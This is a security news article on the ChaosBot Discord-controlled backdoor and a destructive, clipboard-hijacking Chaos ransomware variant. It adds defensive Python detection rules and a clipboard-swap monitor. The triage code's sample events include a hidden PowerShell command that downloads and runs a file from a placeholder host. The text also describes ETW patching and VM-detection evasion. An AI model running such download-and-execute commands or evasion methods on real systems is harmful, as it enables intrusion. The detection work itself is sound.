ChaosBot, New Rust-Based Malware Uses Discord Channels to Access Victims’ PCs


“A new Rust-based malware known as ChaosBot is drawing attention for using Discord channels to control victims’ PCs.”

Details of a new Rust-based backdoor known as ChaosBot, which lets its operators perform reconnaissance and execute arbitrary commands on infected hosts, have been made public by cybersecurity researchers.

eSentire, Technical Report

“Threat actors used compromised credentials linked to an overprivileged Active Directory account called ‘serviceaccount’ as well as a Cisco VPN.”

“They used WMI to run remote commands across network systems using the hacked account, which made it easier to deploy and run ChaosBot.”


According to the Canadian cybersecurity firm, the backdoor was first observed in the environment of a financial services client in late September 2025.

“Event Tracing for Windows (ETW) and virtual machines are circumvented by new ChaosBot variants using evasion tactics.”

“The first method is to patch the first few instructions of ntdll!EtwEventWrite (xor eax, eax -> ret). The second method compares the system’s MAC addresses to prefixes for virtual machine MAC addresses that are known for VMware and VirtualBox. The malware removes itself if a match is discovered.”

Separately, the Chaos ransomware family has evolved into a more aggressive and complex threat aimed at maximizing financial gain, as shown by its dual approach of destructive encryption and covert cryptocurrency theft (detailed in the Chaos ransomware section below).


ChaosBot’s misuse of Discord for command-and-control (C2) is notable. The threat actor behind it uses the Discord persona “chaos_00019” to issue commands to compromised devices, and the malware takes its name from this profile. A second Discord user account, Lovebb0024, is also linked to the C2 operations.

ChaosBot has also been distributed through phishing emails carrying a malicious Windows shortcut (LNK) file. If the recipient opens the LNK file, a PowerShell command runs to download and execute ChaosBot, while a decoy PDF posing as official correspondence from the State Bank of Vietnam is displayed as a distraction.

The malicious DLL (“msedge_elf.dll”) is sideloaded by the legitimate Microsoft Edge binary “identity_helper.exe”. Once running, ChaosBot performs system reconnaissance and downloads fast reverse proxy (FRP) to open a reverse proxy into the network and keep access to the compromised environment for as long as possible.

The threat actors have also been observed using the malware to attempt to set up a Visual Studio Code Tunnel service as an additional backdoor with command execution capability. The malware’s main function, however, is to communicate with a Discord channel that the operator creates using the victim’s computer identity, in order to fetch further instructions.
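As an added example (not eSentire’s detection content and not ChaosBot’s code), a small set of triage rules for the delivery and persistence steps described in the last three paragraphs: the LNK-launched PowerShell download cradle, identity_helper.exe sideloading msedge_elf.dll from outside the Edge install directory, the FRP client, and a VS Code tunnel being installed. The events are constructed and modelled on Sysmon field names (EventID 1 ProcessCreate, EventID 7 ImageLoad); the binary names for FRP (frpc.exe/frps.exe) and the VS Code CLI (code.exe/code-tunnel.exe), the cradle keyword list and the paths are my assumptions, and a renamed binary will evade the name-based rules.

```python
import ntpath
from typing import Callable, Dict, List, Optional, Tuple

Event = Dict[str, object]

# Legitimate home of identity_helper.exe and msedge_elf.dll (assumption: default Edge install layout).
EDGE_INSTALL_MARKER = "\\microsoft\\edge\\application\\"
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                  "start-bitstransfer", "-enc", "-w hidden", "-windowstyle hidden")
FRP_BINARIES = {"frpc.exe", "frps.exe"}       # assumption: default fast reverse proxy names
VSCODE_CLI = {"code.exe", "code-tunnel.exe"}  # assumption: VS Code CLI binaries that run `tunnel`


def _base(path: object) -> str:
    return ntpath.basename(str(path)).lower()


def rule_lnk_powershell_cradle(ev: Event) -> Optional[str]:
    """LNK phish: explorer.exe (the LNK launcher) spawns PowerShell with a download cradle."""
    if ev.get("EventID") != 1 or _base(ev.get("Image")) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if _base(ev.get("ParentImage")) != "explorer.exe":
        return None
    cmd = str(ev.get("CommandLine", "")).lower()
    hits = [m for m in CRADLE_MARKERS if m in cmd]
    return f"PowerShell from explorer.exe with {hits}" if hits else None


def rule_edge_sideload(ev: Event) -> Optional[str]:
    """identity_helper.exe loading msedge_elf.dll from anywhere but its own Edge directory."""
    if ev.get("EventID") != 7 or _base(ev.get("Image")) != "identity_helper.exe":
        return None
    if _base(ev.get("ImageLoaded")) != "msedge_elf.dll":
        return None
    exe_dir = ntpath.dirname(str(ev["Image"])).lower()
    dll_dir = ntpath.dirname(str(ev["ImageLoaded"])).lower()
    if EDGE_INSTALL_MARKER in exe_dir and exe_dir == dll_dir:
        return None  # both binaries sit in the Edge install tree: expected behaviour
    return f"msedge_elf.dll sideloaded from {dll_dir}"


def rule_frp(ev: Event) -> Optional[str]:
    """fast reverse proxy client/server started (name-based; renamed binaries evade this)."""
    if ev.get("EventID") == 1 and _base(ev.get("Image")) in FRP_BINARIES:
        return f"fast reverse proxy started: {ev.get('CommandLine')}"
    return None


def rule_vscode_tunnel(ev: Event) -> Optional[str]:
    """VS Code CLI invoked with the `tunnel` subcommand (extra backdoor)."""
    if ev.get("EventID") == 1 and _base(ev.get("Image")) in VSCODE_CLI \
            and "tunnel" in str(ev.get("CommandLine", "")).lower():
        return f"VS Code tunnel: {ev.get('CommandLine')}"
    return None


RULES: Tuple[Callable[[Event], Optional[str]], ...] = (
    rule_lnk_powershell_cradle, rule_edge_sideload, rule_frp, rule_vscode_tunnel,
)


def triage(events: List[Event]) -> List[Tuple[str, str]]:
    """Run every rule over every event; return (rule name, detail) for each hit."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append((rule.__name__, detail))
    return findings


# Constructed sample telemetry (TEST-NET address, placeholder Edge version directory).
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -nop -c "iwr http://203.0.113.10/u -OutFile $env:TEMP\\u.exe; start $env:TEMP\\u.exe"'},
    {"EventID": 7, "Image": r"C:\Users\u\AppData\Roaming\Updater\identity_helper.exe",
     "ImageLoaded": r"C:\Users\u\AppData\Roaming\Updater\msedge_elf.dll"},
    {"EventID": 7, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\1.0.0.0\identity_helper.exe",
     "ImageLoaded": r"C:\Program Files (x86)\Microsoft\Edge\Application\1.0.0.0\msedge_elf.dll"},
    {"EventID": 1, "Image": r"C:\Users\u\AppData\Local\Temp\frpc.exe",
     "ParentImage": r"C:\Users\u\AppData\Roaming\Updater\identity_helper.exe",
     "CommandLine": "frpc.exe -c frpc.toml"},
    {"EventID": 1, "Image": r"C:\Users\u\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe",
     "ParentImage": r"C:\Users\u\AppData\Roaming\Updater\identity_helper.exe",
     "CommandLine": "code-tunnel.exe tunnel service install --accept-server-license-terms"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for name, detail in triage(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

The sideload rule keys on location rather than on the DLL name alone because the legitimate msedge_elf.dll is loaded by identity_helper.exe on every Edge installation; it is the pair appearing outside the Edge install tree that is the signal. The third sample event is there to show the benign case is not flagged.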

Image Shows ChaosBot

Some of the supported commands are listed below:

  • shell, to run shell commands via PowerShell
  • scr, to take screenshots
  • download, to transfer a file to the victim’s device
  • upload, to send a file from the victim’s device to the Discord channel

Chaos Ransomware Adds Destructive and Clipboard-Hijacking Capabilities

The disclosure comes as Fortinet FortiGuard Labs described a new C++ variant of Chaos ransomware that permanently destroys large files instead of encrypting them and hijacks the clipboard, swapping Bitcoin addresses for an attacker-controlled wallet in order to redirect cryptocurrency transfers.

By combining destructive extortion with clipboard hijacking for cryptocurrency theft, the attackers aim to establish Chaos-C++ as a weapon that not only encrypts files but also wipes the contents of any file larger than 1.3 GB and enables financial fraud.
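As an added example (not Fortinet’s analysis code and not Chaos-C++’s), a clipboard monitor that flags the address-swap behaviour described above: a valid Bitcoin address copied by the user being replaced, within seconds and by a different process, with a different valid Bitcoin address. The address validator covers Base58Check (1…/3…) and bech32/bech32m (bc1…) addresses so that the monitor only reacts to strings the hijacker could plausibly be targeting. On Windows the observations would come from polling the clipboard and GetClipboardOwner(); here they are a constructed list so the logic runs offline. The addresses used are well-known public example addresses, and the process names are assumptions.

```python
import hashlib
from typing import Dict, List, Optional, Tuple

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
BECH32_CONST, BECH32M_CONST = 1, 0x2BC830A3


def _base58check_ok(addr: str) -> bool:
    """Legacy (1...) and P2SH (3...) addresses: 25 bytes, last 4 = SHA256d(first 21)[:4]."""
    n = 0
    for ch in addr:
        if ch not in B58_ALPHABET:
            return False
        n = n * 58 + B58_ALPHABET.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    raw = b"\x00" * (len(addr) - len(addr.lstrip("1"))) + body  # leading '1's are zero bytes
    if len(raw) != 25:
        return False
    return hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()[:4] == raw[21:]


def _bech32_polymod(values: List[int]) -> int:
    gen = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= gen[i]
    return chk


def _bech32_ok(addr: str) -> bool:
    """Native SegWit (bc1q...) and Taproot (bc1p...) addresses, BIP-173 / BIP-350 checksum."""
    lower = addr.lower()
    if addr not in (lower, addr.upper()) or "1" not in lower:
        return False  # mixed case is invalid by specification
    hrp, data = lower.rsplit("1", 1)
    if hrp != "bc" or len(data) < 6 or any(c not in BECH32_CHARSET for c in data):
        return False
    expanded = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    chk = _bech32_polymod(expanded + [BECH32_CHARSET.index(c) for c in data])
    # witness version 0 ('q') uses bech32; version 1 and above use bech32m
    return chk == (BECH32_CONST if data[0] == "q" else BECH32M_CONST)


def is_btc_address(s: str) -> bool:
    s = s.strip()
    if s[:1] in ("1", "3") and 26 <= len(s) <= 35:
        return _base58check_ok(s)
    if s.lower().startswith("bc1"):
        return _bech32_ok(s)
    return False


# One clipboard observation: (seconds since monitor start, clipboard text, process that set it)
Observation = Tuple[float, str, str]


def detect_clipboard_swaps(observations: List[Observation], window_s: float = 2.0) -> List[Dict[str, object]]:
    """Flag a valid BTC address replaced by a different valid BTC address within
    `window_s` seconds by a process other than the one the user copied from."""
    alerts: List[Dict[str, object]] = []
    prev: Optional[Observation] = None
    for obs in observations:
        t, text, setter = obs
        if prev is not None:
            pt, ptext, psetter = prev
            if (is_btc_address(ptext) and is_btc_address(text) and ptext != text
                    and t - pt <= window_s and setter != psetter):
                alerts.append({"at": t, "original": ptext, "replacement": text, "by": setter})
        prev = obs
    return alerts


# Constructed observations: a user copies a payee address from the browser and a
# process named after the fake "system optimizer" overwrites it 200 ms later.
SAMPLE_OBSERVATIONS: List[Observation] = [
    (0.0, "meeting notes for tuesday", "notepad.exe"),
    (5.0, "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa", "chrome.exe"),
    (5.2, "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy", "SystemOptimizer.exe"),
    (40.0, "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4", "electrum.exe"),
    (90.0, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2", "chrome.exe"),
]

if __name__ == "__main__":
    for alert in detect_clipboard_swaps(SAMPLE_OBSERVATIONS):
        print(alert)
```

The owner-process and time-window conditions are what keep this from firing on a user who legitimately copies two addresses in a row; the hijacker is distinguished by writing the clipboard immediately after someone else did. The same shape of check applies to any other wallet format the variant may target.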

To trick users into installing it, the Chaos-C++ downloader impersonates legitimate programs such as “System Optimizer v2.1”. Earlier Chaos variants, such as Lucky Gh0$t, were distributed under the guise of InVideo AI and OpenAI ChatGPT.

Once launched, the malware checks for a file named “%APPDATA%\READ_IT.txt”, whose presence indicates that the ransomware has already run on the machine. If the file exists, it enters what is called monitoring mode and watches the system clipboard.

If the file is absent, Chaos-C++ first checks whether it is running with administrative privileges; if so, it runs a set of commands to inhibit system recovery. It then starts the encryption routine, fully encrypting files under 50 MB and skipping those between 50 MB and 1.3 GB, presumably for speed, while files larger than 1.3 GB are destroyed rather than encrypted.

Fortinet

“Chaos-C++ uses a variety of techniques, such as symmetric or asymmetric encryption and a fallback XOR procedure, rather than depending only on full file encryption.”

“Its flexible downloader ensures successful execution as well. When combined, these strategies strengthen the ransomware’s execution and make it more difficult to stop.”
